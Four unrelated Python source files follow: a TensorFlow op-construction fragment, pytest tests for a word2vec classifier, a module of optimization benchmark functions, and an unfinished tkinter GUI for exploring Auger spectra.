elif input_arg.type_attr in default_type_attr_map:
# The dtype could not be inferred solely from the inputs,
# so we prefer the attr's default, so code that adds a new attr
# with a default is backwards compatible.
default_dtype = default_type_attr_map[input_arg.type_attr]
try:
values = ops.convert_to_tensor(
values,
name=input_arg.name,
dtype=dtype,
as_ref=input_arg.is_ref,
preferred_dtype=default_dtype)
except TypeError as err:
if dtype is None:
raise err
else:
raise TypeError(
"Expected %s passed to parameter '%s' of op '%s', got %s of "
"type '%s' instead. Error: %s" %
(dtypes.as_dtype(dtype).name, input_arg.name, op_type_name,
repr(values), type(values).__name__, err))
except ValueError:
# What type does convert_to_tensor think it has?
try:
observed = ops.convert_to_tensor(
values, as_ref=input_arg.is_ref).dtype.name
except ValueError as err:
raise ValueError(
"Tried to convert '%s' to a tensor and failed. Error: %s" %
(input_name, err))
prefix = ("Input '%s' of '%s' Op has type %s that does not match" %
(input_name, op_type_name, observed))
if input_arg.type != types_pb2.DT_INVALID:
raise TypeError("%s expected type of %s." %
(prefix, dtypes.as_dtype(input_arg.type).name))
else:
# Update the maps with the default, if needed.
k = input_arg.type_attr
if k in default_type_attr_map:
if k not in attrs:
attrs[k] = default_type_attr_map[k]
if k not in inferred_from:
inferred_from[k] = "Default in OpDef"
raise TypeError(
"%s type %s of argument '%s'." %
(prefix, dtypes.as_dtype(attrs[input_arg.type_attr]).name,
inferred_from[input_arg.type_attr]))
types = [values.dtype]
inputs.append(values)
base_types = [x.base_dtype for x in types]
if input_arg.number_attr:
# <number-attr> * <type> or <number-attr> * <type-attr>
if input_arg.number_attr in attrs:
if len(values) != attrs[input_arg.number_attr]:
raise ValueError(
"List argument '%s' to '%s' Op with length %d must match "
"length %d of argument '%s'." %
(input_name, op_type_name, len(values),
attrs[input_arg.number_attr],
inferred_from[input_arg.number_attr]))
else:
attrs[input_arg.number_attr] = len(values)
inferred_from[input_arg.number_attr] = input_name
num_attr = _Attr(op_def, input_arg.number_attr)
if num_attr.has_minimum and len(values) < num_attr.minimum:
raise ValueError(
"List argument '%s' to '%s' Op with length %d shorter "
"than minimum length %d." %
(input_name, op_type_name, len(values), num_attr.minimum))
# All tensors must have the same base type.
if any(bt != base_types[0] for bt in base_types):
raise TypeError(
"All tensors passed to '%s' of '%s' Op "
"must have the same type." %
(input_name, op_type_name))
if input_arg.type != types_pb2.DT_INVALID:
# <number-attr> * <type> case
if base_types and base_types[0] != input_arg.type:
assert False, "Unreachable"
elif input_arg.type_attr in attrs:
# <number-attr> * <type-attr> case, where <type-attr> already
# has an inferred value.
if base_types and base_types[0] != attrs[input_arg.type_attr]:
assert False, "Unreachable"
else:
# <number-attr> * <type-attr> case, where we are now setting
# the <type-attr> based on this input
if not base_types:
# If it's in default_type_attr_map, then wait to set it
# (in "process remaining attrs", below).
if input_arg.type_attr not in default_type_attr_map:
raise TypeError(
"Don't know how to infer type variable from empty input "
"list passed to input '%s' of '%s' Op." %
(input_name, op_type_name))
else:
attrs[input_arg.type_attr] = base_types[0]
inferred_from[input_arg.type_attr] = input_name
type_attr = _Attr(op_def, input_arg.type_attr)
_SatisfiesTypeConstraint(base_types[0], type_attr,
param_name=input_name)
elif input_arg.type_attr:
# <type-attr>
attr_value = base_types[0]
if input_arg.type_attr in attrs:
if attrs[input_arg.type_attr] != attr_value:
raise TypeError(
"Input '%s' of '%s' Op has type %s that does not "
"match type %s of argument '%s'." %
(input_name, op_type_name, dtypes.as_dtype(attr_value).name,
dtypes.as_dtype(attrs[input_arg.type_attr]).name,
inferred_from[input_arg.type_attr]))
else:
for base_type in base_types:
_SatisfiesTypeConstraint(base_type,
_Attr(op_def, input_arg.type_attr),
param_name=input_name)
attrs[input_arg.type_attr] = attr_value
inferred_from[input_arg.type_attr] = input_name
elif input_arg.type_list_attr:
# <type-list-attr>
attr_value = base_types
if input_arg.type_list_attr in attrs:
if attrs[input_arg.type_list_attr] != attr_value:
raise TypeError(
"Input '%s' of '%s' Op has type list of %s that does not "
"match type list %s of argument '%s'." %
(input_name, op_type_name,
", ".join(dtypes.as_dtype(x).name for x in attr_value),
", ".join(dtypes.as_dtype(x).name
for x in attrs[input_arg.type_list_attr]),
inferred_from[input_arg.type_list_attr]))
else:
for base_type in base_types:
_SatisfiesTypeConstraint(base_type,
_Attr(op_def, input_arg.type_list_attr),
param_name=input_name)
attrs[input_arg.type_list_attr] = attr_value
inferred_from[input_arg.type_list_attr] = input_name
else:
# single Tensor with specified type
if base_types[0] != input_arg.type:
assert False, "Unreachable"
if input_arg.is_ref:
if not all(x._is_ref_dtype for x in types): # pylint: disable=protected-access
raise TypeError(
("'%s' Op requires that input '%s' be a mutable tensor "
"(e.g.: a tf.Variable)") % (op_type_name, input_name))
input_types.extend(types)
else:
input_types.extend(base_types)
# Process remaining attrs
for attr in op_def.attr:
# Skip attrs that have already had their values inferred
if attr.name in attrs:
if attr.name in keywords:
raise TypeError(
"Should not specify value for inferred attr '%s'." % attr.name)
continue
if attr.name in keywords:
attrs[attr.name] = keywords.pop(attr.name)
elif attr.name + "_" in keywords:
# Attrs whose names match Python keywords have an extra '_'
# appended, so we must check for that as well.
attrs[attr.name] = keywords.pop(attr.name + "_")
elif attr.name in default_type_attr_map:
attrs[attr.name] = default_type_attr_map[attr.name]
inferred_from.setdefault(attr.name, "Default in OpDef")
else:
raise TypeError("No argument for attr " + attr.name)
# Convert attr values to AttrValue protos.
attr_protos = {}
for attr_def in op_def.attr:
key = attr_def.name
value = attrs[key]
attr_value = attr_value_pb2.AttrValue()
if attr_def.HasField("default_value") and value is None:
attr_value.CopyFrom(attr_def.default_value)
attr_protos[key] = attr_value
continue
if attr_def.type.startswith("list("):
if not _IsListValue(value):
raise TypeError("Expected list for attr " + key)
if attr_def.has_minimum:
if len(value) < attr_def.minimum:
raise ValueError("Attr '%s' of '%s' Op passed list of length %d "
"less than minimum %d." %
(key, op_type_name, len(value),
attr_def.minimum))
attr_value.list.SetInParent()
if attr_def.type == "string":
attr_value.s = _MakeStr(value, key)
if attr_def.HasField("allowed_values"):
if attr_value.s not in attr_def.allowed_values.list.s:
raise ValueError(
"Attr '%s' of '%s' Op passed string '%s' not in: \"%s\"." %
(key, op_type_name, compat.as_text(attr_value.s),
'", "'.join(map(compat.as_text,
attr_def.allowed_values.list.s))))
elif attr_def.type == "list(string)":
attr_value.list.s.extend([_MakeStr(x, key) for x in value])
if attr_def.HasField("allowed_values"):
for x in attr_value.list.s:
if x not in attr_def.allowed_values.list.s:
raise ValueError(
"Attr '%s' of '%s' Op passed string '%s' not in: \"%s\"." %
(key, op_type_name, compat.as_text(x),
'", "'.join(map(compat.as_text,
attr_def.allowed_values.list.s))))
elif attr_def.type == "int":
attr_value.i = _MakeInt(value, key)
if attr_def.has_minimum:
if attr_value.i < attr_def.minimum:
raise ValueError(
"Attr '%s' of '%s' Op passed %d less than minimum %d." %
(key, op_type_name, attr_value.i, attr_def.minimum))
elif attr_def.type == "list(int)":
attr_value.list.i.extend([_MakeInt(x, key) for x in value])
elif attr_def.type == "float":
attr_value.f = _MakeFloat(value, key)
elif attr_def.type == "list(float)":
attr_value.list.f.extend([_MakeFloat(x, key) for x in value])
elif attr_def.type == "bool":
attr_value.b = _MakeBool(value, key)
elif attr_def.type == "list(bool)":
attr_value.list.b.extend([_MakeBool(x, key) for x in value])
elif attr_def.type == "type":
attr_value.type = _MakeType(value, attr_def)
elif attr_def.type == "list(type)":
attr_value.list.type.extend(
[_MakeType(x, attr_def) for x in value])
elif attr_def.type == "shape":
attr_value.shape.CopyFrom(_MakeShape(value, key))
elif attr_def.type == "list(shape)":
attr_value.list.shape.extend(
[_MakeShape(x, key) for x in value])
elif attr_def.type == "tensor":
attr_value.tensor.CopyFrom(_MakeTensor(value, key))
elif attr_def.type == "list(tensor)":
attr_value.list.tensor.extend(
[_MakeTensor(x, key) for x in value])
elif attr_def.type == "func":
attr_value.func.CopyFrom(_MakeFunc(value, key))
elif attr_def.type == "list(func)":
attr_value.list.func.extend([_MakeFunc(x, key) for x in value])
else:
raise TypeError("Unrecognized Attr type " + attr_def.type)
attr_protos[key] = attr_value
del attrs # attrs is no longer authoritative, use attr_protos instead
# Determine output types (possibly using attrs)
output_structure = []
for arg in op_def.output_arg:
if arg.number_attr:
n = _AttrValue(attr_protos, arg.number_attr).i
output_structure.append(n)
elif arg.type_attr:
t = _AttrValue(attr_protos, arg.type_attr)
output_structure.append(None)
elif arg.type_list_attr:
t = _AttrValue(attr_protos, arg.type_list_attr)
output_structure.append(len(t.list.type))
else:
output_structure.append(None)
if keywords:
raise TypeError("apply_op() got unexpected keyword arguments: " +
", ".join(sorted(keywords.keys())))
# NOTE(mrry): We add an explicit colocation constraint between
# the newly created op and any of its reference-typed inputs.
must_colocate_inputs = [val for arg, val in zip(op_def.input_arg, inputs)
if arg.is_ref]
with _MaybeColocateWith(must_colocate_inputs):
# Add Op to graph
# pylint: disable=protected-access
op = g._create_op_internal(op_type_name, inputs, dtypes=None,
name=scope, input_types=input_types,
attrs=attr_protos, op_def=op_def)
# `outputs` is returned as a separate return value so that the output
# tensors and the `op` per se can be decoupled, which allows the
# `op_callbacks` to function properly. See framework/op_callbacks.py
# for more details.
outputs = op.outputs
# Conditionally invoke tfdbg v2's op callback(s).
if op_callbacks.should_invoke_op_callbacks():
callback_outputs = op_callbacks.invoke_op_callbacks(
op.node_def.op, tuple(op.inputs), attr_protos, tuple(outputs),
op_name=op.name, graph=g)
if callback_outputs is not None:
outputs = callback_outputs
return output_structure, op_def.is_stateful, op, outputs
|
|
"""Tests for models.text.py."""
import types
from unittest.mock import patch
import numpy as np
import pytest
class TestW2VClassifier:
@pytest.fixture
def mock_load_w2v_format(self):
word2idx = {'first': 0, 'second': 1, 'third': 2, 'fourth': 3}
syn0 = np.array([
[0.1, 0.1, 0.1],
[10.0, 10.0, 10.1],
[-0.1, -0.1, -0.1],
[-0.1, -0.1, 0.1],
])
return word2idx, syn0
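# Geometry of the mock vectors (after row normalization): 'first' and 'second'
# are nearly parallel, 'third' points in the opposite direction, and 'fourth'
# sits in between, which fixes the neighbor orderings and similarity values
# asserted in the tests below.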
@pytest.fixture
def mock_w2v_classifier_cls(self, mock_load_w2v_format):
"""Return a W2VClassifier with a mocked fit method."""
from dstoolbox.models import W2VClassifier
from dstoolbox.utils import normalize_matrix
# pylint: disable=unused-argument
def mock_fit(self, X=None, y=None):
word2idx, syn0 = mock_load_w2v_format
self.word2idx_ = word2idx
self.classes_ = np.array(sorted(word2idx, key=word2idx.get))
self.syn0_ = normalize_matrix(syn0)
return self
W2VClassifier.fit = types.MethodType(mock_fit, W2VClassifier('a/path'))
return W2VClassifier
@pytest.fixture
def clf(self, mock_w2v_classifier_cls):
return mock_w2v_classifier_cls('a/path').fit()
@staticmethod
def assert_most_similar_are_equal(expected, results, atol=1e-5):
for (r_word, r_simil), (e_word, e_simil) in zip(results, expected):
assert r_word == e_word
assert np.isclose(r_simil, e_simil, atol=atol)
def test_word2vec_classifier_mocked_fit(self, mock_load_w2v_format):
with patch('dstoolbox.models.text.load_w2v_format') as load:
word2idx, syn0 = mock_load_w2v_format
load.return_value = mock_load_w2v_format
from dstoolbox.models import W2VClassifier
from dstoolbox.utils import normalize_matrix
clf = W2VClassifier('a/path')
clf.fit()
assert (clf.syn0_ == normalize_matrix(syn0)).all()
assert clf.word2idx_ == word2idx
assert clf.classes_.tolist() == ['first', 'second',
'third', 'fourth']
def test_word2vec_classifier_fit(self, mock_w2v_classifier_cls):
clf = mock_w2v_classifier_cls.fit()
assert isinstance(clf.word2idx_, dict)
assert isinstance(clf.syn0_, np.ndarray)
assert (clf.classes_ ==
np.array(['first', 'second', 'third', 'fourth'])).all()
@pytest.mark.parametrize('word, expected', [
('first', np.array([[0.1, 0.1, 0.1]])),
('second', np.array([[10.0, 10.0, 10.1]])),
])
def test_word2vec_classifier_get_vector_from_word(
self, clf, word, expected):
from dstoolbox.models.text import normalize_matrix
# pylint: disable=protected-access
result = clf._get_vector_from_word(word)
expected = normalize_matrix(expected).tolist()[0]
assert result.tolist() == expected
@pytest.mark.parametrize('vector', [
np.array([1, 2, 3]),
np.array([[1, 2, 3]])
])
def test_word2vec_classifier_update_vocabulary_vector_1d(
self, clf, vector):
# pylint: disable=protected-access
clf._update_vocabulary('fifth', vector)
assert clf.word2idx_['fifth'] == 4
assert clf.classes_[-1] == 'fifth'
assert (clf.syn0_[-1] == vector).all()
@pytest.mark.parametrize('w1, w2', [
('first', 'second'),
('second', 'third'),
('first', 'fourth'),
])
def test_word2vec_classifier_add_word_vectors(self, clf, w1, w2):
# pylint: disable=protected-access
from dstoolbox.utils import normalize_matrix
result = clf._add_word_vectors([w1, w2])
v1 = clf._get_vector_from_word(w1)
v2 = clf._get_vector_from_word(w2)
expected = normalize_matrix((v1 + v2).reshape(1, -1))
assert (result == expected).all()
def test_word2vec_classifier_get_vector_unknown_word_raises(self, clf):
with pytest.raises(KeyError):
# pylint: disable=protected-access
clf._get_vector_from_word('unknown_word')
def test_word2vec_classifier_kneighbors_no_distances(self, clf):
neighbors = clf.kneighbors(['first'], return_distance=False)
assert neighbors.tolist()[0] == [1, 3, 2]
@pytest.mark.parametrize('word, expected', [
('first', [1, 3, 2]),
('third', [3, 1, 0]),
])
def test_word2vec_classifier_kneighbors_with_distances_top3(
self, clf, word, expected):
neighbors, distances = clf.kneighbors([word])
assert neighbors.tolist()[0] == expected
assert 0 <= distances[0][0] <= distances[0][1] <= distances[0][2]
@pytest.mark.parametrize('word, expected', [
('first', [1, 3]),
('third', [3, 1]),
])
def test_word2vec_classifier_kneighbors_with_distances_top2(
self, clf, word, expected):
neighbors, distances = clf.kneighbors([word], 2)
assert neighbors.tolist()[0] == expected
assert 0 <= distances[0][0] <= distances[0][1]
@pytest.mark.parametrize('word, expected', [
('first', [1]),
('third', [3]),
])
def test_word2vec_classifier_kneighbors_with_distances_top1(
self, clf, word, expected):
neighbors, distances = clf.kneighbors([word], 1)
assert neighbors.tolist()[0] == expected
assert distances[0][0] >= 0
def test_word2vec_classifier_most_similar_multiple_positives(
self, clf):
results = clf.most_similar(positive=['first', 'second'])
expected = [('first', 1.0), ('second', 1.0),
('fourth', 0.33444), ('third', 0.0)]
self.assert_most_similar_are_equal(expected, results)
def test_word2vec_classifier_most_similar_negative_keyword_used(
self, clf):
with pytest.raises(NotImplementedError):
clf.most_similar(positive=['first'], negative=['second'])
def test_word2vec_classifier_most_similar_positive_not_exactly_one_word(
self, clf):
with pytest.raises(ValueError):
clf.most_similar(positive=[])
@pytest.mark.parametrize('word, expected', [
('first', [('second', 1.0),
('fourth', 1.0 / 3.0),
('third', 0.0)]),
('third', [('fourth', 2.0 / 3.0),
('second', 0.0),
('first', 0.0)]),
])
def test_word2vec_classifier_most_similar_top3(self, word, expected, clf):
results = clf.most_similar(word)
self.assert_most_similar_are_equal(expected, results)
@pytest.mark.parametrize('word, expected', [
('first', [('second', 1.0),
('fourth', 1.0 / 3.0)]),
('third', [('fourth', 2.0 / 3.0),
('second', 0.0)]),
])
def test_word2vec_classifier_most_similar_top2(self, word, expected, clf):
results = clf.most_similar(word)
self.assert_most_similar_are_equal(expected, results)
@pytest.mark.parametrize('word, expected', [
('first', 'second'),
('third', 'fourth'),
])
def test_word2vec_classifier_predict_one_sample(self, word, expected, clf):
y_pred = clf.predict([word])
result = clf.classes_[y_pred].tolist()[0]
assert isinstance(y_pred, np.ndarray)
assert y_pred.shape == (1,)
assert result == expected
def test_word2vec_classifier_predict_two_samples(self, clf):
y_pred = clf.predict(['first', 'third'])
result = clf.classes_[y_pred].tolist()
expected = ['second', 'fourth']
assert isinstance(y_pred, np.ndarray)
assert y_pred.shape == (2,)
assert result == expected
def test_word2vec_classifier_predict_proba_raises(self, clf):
with pytest.raises(NotImplementedError):
clf.predict_proba(['first'])
|
|
import sys
import numpy as np
from abc import ABCMeta, abstractmethod
class OptimizationTestFunction(metaclass=ABCMeta):
    """
    General class for test functions used for optimization.
    """
def __init__(self, mindim=1, maxdim=None, domain=np.array([-1, 1])):
self.mindim = mindim
self.maxdim = maxdim
self.domain = domain
@staticmethod
def function(x):
return np.sum(np.abs(x))
@abstractmethod
def minimum(self, ndim):
pass
def fminimum(self, ndim):
x = self.minimum(ndim)
return self.function(x)
def get_plot_matrices(self, shape=None):
if shape is None:
shape = [200, 200]
if self.domain.ndim == 1:
dx = float(self.domain[1] - self.domain[0]) / (shape[0])
X, Y = np.mgrid[self.domain[0]:self.domain[1]:dx, self.domain[0]:self.domain[1]:dx]
else:
dx = float(self.domain[0, 1] - self.domain[0, 0]) / (shape[0])
dy = float(self.domain[1, 1] - self.domain[1, 0]) / (shape[1])
X, Y = np.mgrid[self.domain[0, 0]:self.domain[0, 1]:dx, self.domain[1, 0]:self.domain[1, 1]:dy]
Z = self.function(np.array([X, Y]))
return X, Y, Z
class Sphere(OptimizationTestFunction):
def __init__(self):
OptimizationTestFunction.__init__(self, mindim=1, maxdim=None, domain=np.array([-5, 5]))
@staticmethod
def function(x):
x = np.array(x)
return np.sum(x.T * x.T, axis=-1).T
def minimum(self, ndim):
return np.zeros(ndim)
class Ackley(OptimizationTestFunction):
def __init__(self):
OptimizationTestFunction.__init__(self, mindim=1, maxdim=None, domain=np.array([-5, 5]))
@staticmethod
def function(x):
n = len(x)
exp1 = np.exp(-0.2 * np.sqrt(1.0 / n * np.sum(x * x)))
exp2 = np.exp(1.0 / n * np.sum((np.cos(2 * np.pi * x)).T, axis=-1).T)
return -20 * exp1 - exp2 + np.e + 20
def minimum(self, ndim):
return np.zeros(ndim)
class Rosenbrock(OptimizationTestFunction):
def __init__(self):
OptimizationTestFunction.__init__(self, mindim=1, maxdim=None, domain=np.array([-5, 5]))
@staticmethod
def function(x):
return np.sum((100.0 * (x[1:] - x[:-1] ** 2.0) ** 2.0 + (1 - x[:-1]) ** 2.0).T, axis=-1).T
def minimum(self, ndim):
return np.ones(ndim)
class Beale(OptimizationTestFunction):
def __init__(self):
OptimizationTestFunction.__init__(self, mindim=2, maxdim=2, domain=np.array([-4.5, 4.5]))
@staticmethod
def function(x):
return (1.5 - x[0] + x[0] * x[1]) ** 2 + (2.25 - x[0] + x[0] * x[1] * x[1]) ** 2 + (2.625 - x[0] + x[0] * x[1] *
x[1] * x[1]) ** 2
def minimum(self, ndim):
assert ndim == 2
return np.array([3.0, 0.5])
class GoldsteinPrice(OptimizationTestFunction):
def __init__(self):
OptimizationTestFunction.__init__(self, mindim=2, maxdim=2, domain=np.array([-2, 2]))
@staticmethod
def function(x):
factor1 = (19 - 14 * x[0] + 3 * x[0] ** 2 - 14 * x[1] + 6 * x[0] * x[1] + 3 * x[1] ** 2)
factor2 = (18 - 32 * x[0] + 12 * x[0] ** 2 + 48 * x[1] - 36 * x[0] * x[1] + 27 * x[1] ** 2)
return (1 + ((x[0] + x[1] + 1) ** 2) * factor1) * (30 + ((2 * x[0] - 3 * x[1]) ** 2) * factor2)
def minimum(self, ndim):
assert ndim == 2
return np.array([0.0, -1.0])
class Booth(OptimizationTestFunction):
def __init__(self):
OptimizationTestFunction.__init__(self, mindim=2, maxdim=2, domain=np.array([-10, 10]))
@staticmethod
def function(x):
return (x[0] + 2 * x[1] - 7) ** 2 + (2 * x[0] + x[1] - 5) ** 2
def minimum(self, ndim):
assert ndim == 2
return np.array([1.0, 3.0])
class BukinN6(OptimizationTestFunction):
def __init__(self):
OptimizationTestFunction.__init__(self, mindim=2, maxdim=2, domain=np.array([[-15, 15], [-3, 3]]))
@staticmethod
def function(x):
return 100 * np.sqrt(np.abs(x[1] - 0.01 * x[0] ** 2)) + 0.01 * np.abs(x[0] + 10)
def minimum(self, ndim):
assert ndim == 2
return np.array([-10.0, 1.0])
class Matyas(OptimizationTestFunction):
def __init__(self):
OptimizationTestFunction.__init__(self, mindim=2, maxdim=2, domain=np.array([-10, 10]))
@staticmethod
def function(x):
return 0.26 * (x[0] ** 2 + x[1] ** 2) - 0.48 * x[0] * x[1]
def minimum(self, ndim):
assert ndim == 2
return np.array([0.0, 0.0])
class LeviN13(OptimizationTestFunction):
def __init__(self):
OptimizationTestFunction.__init__(self, mindim=2, maxdim=2, domain=np.array([-10, 10]))
@staticmethod
def function(x):
term1 = (np.sin(3 * np.pi * x[0])) ** 2
term2 = (x[0] - 1) ** 2 * (1 + (np.sin(3 * np.pi * x[1])) ** 2)
term3 = (x[1] - 1) ** 2 * (1 + (np.sin(2 * np.pi * x[1])) ** 2)
return term1 + term2 + term3
def minimum(self, ndim):
assert ndim == 2
return np.array([1.0, 1.0])
class ThreeHump(OptimizationTestFunction):
def __init__(self):
OptimizationTestFunction.__init__(self, mindim=2, maxdim=2, domain=np.array([-10, 10]))
@staticmethod
def function(x):
return 2 * x[0] ** 2 - 1.05 * x[0] ** 4 + 1.0 / 6.0 * x[0] ** 6 + x[0] * x[1] + x[1] ** 2
def minimum(self, ndim):
assert ndim == 2
return np.array([0.0, 0.0])
class Easom(OptimizationTestFunction):
def __init__(self):
OptimizationTestFunction.__init__(self, mindim=2, maxdim=2, domain=np.array([-100, 100]))
@staticmethod
def function(x):
return -np.cos(x[0]) * np.cos(x[1]) * np.exp(-1 * ((x[0] - np.pi) ** 2 + (x[1] - np.pi) ** 2))
def minimum(self, ndim):
assert ndim == 2
return np.array([np.pi, np.pi])
class CrossInTray(OptimizationTestFunction):
def __init__(self):
OptimizationTestFunction.__init__(self, mindim=2, maxdim=2, domain=np.array([-10, 10]))
@staticmethod
def function(x):
factor1 = np.exp(np.abs(100 - np.sqrt(x[0] ** 2 + x[1] ** 2) / np.pi))
return -1E-4 * (np.abs(np.sin(x[0]) * np.sin(x[1]) * factor1) + 1) ** 0.1
def minimum(self, ndim):
assert ndim == 2
return np.array([1.34941, 1.34941])
class Eggholder(OptimizationTestFunction):
def __init__(self):
OptimizationTestFunction.__init__(self, mindim=2, maxdim=2, domain=np.array([-512, 512]))
@staticmethod
def function(x):
return -1.0 * (x[1] + 47) * np.sin(np.sqrt(np.abs(x[1] + x[0] / 2.0 + 47))) - x[0] * np.sin(
np.sqrt(np.abs(x[0] - x[1] - 47)))
def minimum(self, ndim):
assert ndim == 2
return np.array([512, 404.2319])
class HolderTable(OptimizationTestFunction):
def __init__(self):
OptimizationTestFunction.__init__(self, mindim=2, maxdim=2, domain=np.array([-10, 10]))
@staticmethod
def function(x):
return -1.0 * np.abs(np.sin(x[0]) * np.cos(x[1]) * np.exp(np.abs(1 - np.sqrt(x[0] ** 2 + x[1] ** 2) / np.pi)))
def minimum(self, ndim):
assert ndim == 2
return np.array([8.05502, 9.66459])
class McCormick(OptimizationTestFunction):
def __init__(self):
OptimizationTestFunction.__init__(self, mindim=2, maxdim=2, domain=np.array([[-1.5, 4], [-3, 4]]))
@staticmethod
def function(x):
return np.sin(x[0] + x[1]) + (x[0] - x[1]) ** 2 - 1.5 * x[0] + 2.5 * x[1] + 1
def minimum(self, ndim):
assert ndim == 2
return np.array([-0.54719, -1.54719])
class SchafferN2(OptimizationTestFunction):
def __init__(self):
OptimizationTestFunction.__init__(self, mindim=2, maxdim=2, domain=np.array([-100, 100]))
@staticmethod
def function(x):
return 0.5 + ((np.sin(x[0] ** 2 - x[1] ** 2)) ** 2 - 0.5) / (1 + 1E-3 * (x[0] ** 2 + x[1] ** 2)) ** 2
def minimum(self, ndim):
assert ndim == 2
return np.zeros(2)
class SchafferN4(OptimizationTestFunction):
def __init__(self):
OptimizationTestFunction.__init__(self, mindim=2, maxdim=2, domain=np.array([-100, 100]))
@staticmethod
def function(x):
return 0.5 + ((np.cos(np.sin(np.abs(x[0] ** 2 - x[1] ** 2)))) ** 2 - 0.5) / (1 + 1E-3 * (
x[0] ** 2 + x[1] ** 2)) ** 2
def minimum(self, ndim):
assert ndim == 2
return np.array([0, 1.25313])
class StyblinskiTang(OptimizationTestFunction):
def __init__(self):
OptimizationTestFunction.__init__(self, mindim=1, maxdim=None, domain=np.array([-5, 5]))
@staticmethod
def function(x):
return np.sum((x ** 4 - 16 * x ** 2 + 5 * x).T, axis=-1).T / 2.0
def minimum(self, ndim):
return -2.903534 * np.ones(ndim)
# class Simionescu(OptimizationTestFunction):
#
# def __init__(self):
# OptimizationTestFunction.__init__(self, mindim=2, maxdim=2, domain=np.array([-1.25, 1.25]))
#
# @staticmethod
# def function(x):
# rt = 1
# rs = 0.2
# n = 8
# return np.piecewise(x,
# [x[0]**2 + x[1]**2 <= (rt + rs*np.cos(n*np.arctan(x[0]/x[1])))**2,
# x[0]**2 + x[1]**2 > (rt + rs*np.cos(n*np.arctan(x[0]/x[1])))**2], [0.1*x[0]*x[1], 1])
#
#
# def minimum(self, ndim):
# assert ndim == 2
# return -0.84852813*np.ones(ndim)
def all_tests_functions():
current_module = sys.modules[__name__]
f = current_module.__dict__
return [f[x]() for x in f if hasattr(f[x], '__base__') and f[x].__base__ == OptimizationTestFunction]
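# Minimal usage sketch: every benchmark defined above supports 2 dimensions,
# so evaluate each one at its reported minimum; the printed values should be
# the known optima (0.0 for most of these functions).
if __name__ == '__main__':
    for test_function in all_tests_functions():
        print(type(test_function).__name__, test_function.fminimum(2))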
|
|
'''
This is intended to be a plot interface with:
1) a filenumber/filename text string filter (allowing update of the current Augerfile)
2) an adjustable charging energy value
3) comparison of data with plotted line energies (including shift)
entry for element list?
'''
import os
import random
import tkinter as tk
import tkinter.messagebox as tkmess
from tkinter import filedialog
from matplotlib.figure import Figure
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg
# need to load AESdataset class from Auger_shift_pyqt
os.chdir(r'H:\Research_data\Miscellaneous\Auger\PH_NWA')
def AESgui():
''' Launcher function for Auger quantmap GUI '''
root = tk.Tk()
root.wm_title("Auger spectra explorer")
GUIMain(root)
root.mainloop()
return
class GUIMain():
''' Main container for plotter, options (at right), and fileloader (bottom)
pass current working directory as default directory '''
def __init__(self,root):
self.root = root
self.root.wm_title("Auger quant map")
self.plots_frame = tk.Frame(self.root)
self.plots_frame.pack(side=tk.TOP)
self.spec_frame = tk.Frame(self.plots_frame)
self.spec_frame.pack(side=tk.LEFT)
self.roi_frame = tk.Frame(self.root)
self.roi_frame.pack(side=tk.TOP)
self.specviewer= SpectraViewer(self.spec_frame,self)
self.opts = GUIopts(self.roi_frame,self)
# Menubars
self.menubar=tk.Menu(self.root)
filemenu = tk.Menu(self.menubar, tearoff=0)
filemenu.add_command(label="Load AES files", command=self.load_AESfiles)
filemenu.add_command(label="Save", command=lambda:
self.args_popup_menu({'command':'save','radio':[]}))
filemenu.add_command(label="Exit", command=self.on_quitapp)
self.menubar.add_cascade(label="File", menu=filemenu)
self.root.config(menu=self.menubar)
specmenu = tk.Menu(self.menubar, tearoff=0)
# finds negative peaks in sm-diff spectrum for active (checked) elements
specmenu.add_command(label="Find all peaks (deriv + integ) ", command=self.rois.find_all_peaks)
specmenu.add_command(label="Uniform filter", command=lambda:
self.args_popup_menu({'command':'uniform filter', 'entries':[['filter size',1]]}))
specmenu.add_command(label="Mask ", command=lambda:
self.args_popup_menu({'command':'uniform filter', 'entries':[['filter size',1]]}))
self.menubar.add_cascade(label="Spectral Commands", menu=specmenu)
self.root.config(menu=self.menubar)
def on_quitapp(self):
msg = "Quitting:\nUnsaved progress will be lost.\nDo you wish to Continue?"
if tkmess.askokcancel("Quantmap",msg):
self.root.destroy()
    def load_AESfile(self):
        ''' Load Auger dataset by selecting its pixarray file; the containing
        directory is handed to GUIrois to create the QMfile '''
        fullpath= filedialog.askopenfilename(title='Select pixarray file',
            filetypes=[("pix array","*.csv")])
        (directory, filename)=os.path.split(fullpath)
        print('Directory is', directory)
        self.rois.create_QMfile(directory)
def args_popup_menu(self, kwargs):
''' Menu launched top-level window to get entered args/kwargs entry and
then call GUIrois method (home of QMfile data object and other assorted methods)
kwargs: command - name of desired method
param name & associated value (e.g. kwargs={'filter size':1})
implement radiobuttons using 'radio':['plottype',['scatter','line']]
implement checkbuttons using 'check':['add backfit',True]
implement entries using 'entry':['filter size',1]
'''
def abort():
t.destroy()
def runcmd():
''' run command w/ entered args/kwargs '''
# Construct args, kwargs for method call
            myargs={}
            for i, (key, val) in enumerate(kwargs.items()):
                if key!='command':
                    myargs[val[0]] = tkvars[i].get()
                else:
                    myargs['command'] = kwargs.get('command')
self.rois.runcmd(myargs)
t.destroy()
t = tk.Toplevel(self.root) # open new toplevel window
tkvars=[] # Display and alter params passed in kwargs
bottomframe=tk.Frame(t)
# Key gives type of tkinter object
for i, (key, val) in enumerate(kwargs.items()):
if 'rad' in key: # Make radiobutton w/ choices list
prow=tk.Frame(bottomframe)
[param, choices]=kwargs.get(key,[])
tk.Label(prow, text=param).pack(side=tk.LEFT)
tkvars.append(tk.StringVar()) # single common variable for chosen radiobutton
for j, val in enumerate(choices): # list of opts for radiobutton
tk.Radiobutton(prow, text=val, value=val, variable=tkvars[i]).pack(side=tk.LEFT)
prow.pack(side="top", fill="both", expand=True, padx=100, pady=100)
elif 'chk' in key: # each dict val has param name, default bool val as 2 item list
prow=tk.Frame(bottomframe)
[param, val]=kwargs.get(key,['',''])
tkvars.append(tk.BooleanVar())
tkvars[i].set(val)
tk.Checkbutton(prow, text=param, variable=tkvars[i]).pack(side=tk.LEFT)
prow.pack(side="top", fill="both", expand=True, padx=100, pady=100)
elif 'ent' in key:
prow=tk.Frame(bottomframe)
[param, val]=kwargs.get(key,[])
tk.Label(prow, text=param).pack(side=tk.LEFT)
tkvars.append(tk.StringVar())
tk.Entry(prow, textvariable=tkvars[i]).pack(side=tk.LEFT)
prow.pack(side="top", fill="both", expand=True, padx=100, pady=100)
elif key=='command': # put command name at top?
topframe=tk.Frame(t)
tkvars.append(tk.StringVar()) # unused dummy
tk.Label(topframe, text=key).pack(side=tk.LEFT)
